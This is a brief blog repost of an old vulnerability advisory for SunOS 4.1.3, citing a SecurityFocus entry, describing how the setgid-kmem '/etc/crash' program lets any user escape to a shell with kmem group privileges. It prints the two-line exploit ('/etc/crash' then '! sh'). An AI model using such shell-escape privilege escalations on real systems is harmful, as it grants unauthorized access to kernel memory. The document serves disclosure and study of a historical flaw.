SunOS 4.1.3 - '/etc/crash' SetGID kmem Privilege Escalation Secer's Blog - 记录互联网安全历程与个人成长经历

source: http://www.securityfocus.com/bid/59/info

/etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem.

$ /etc/crash
! sh

SunOS 4.1.3 - '/etc/crash' SetGID kmem Privilege Escalation

Hacking more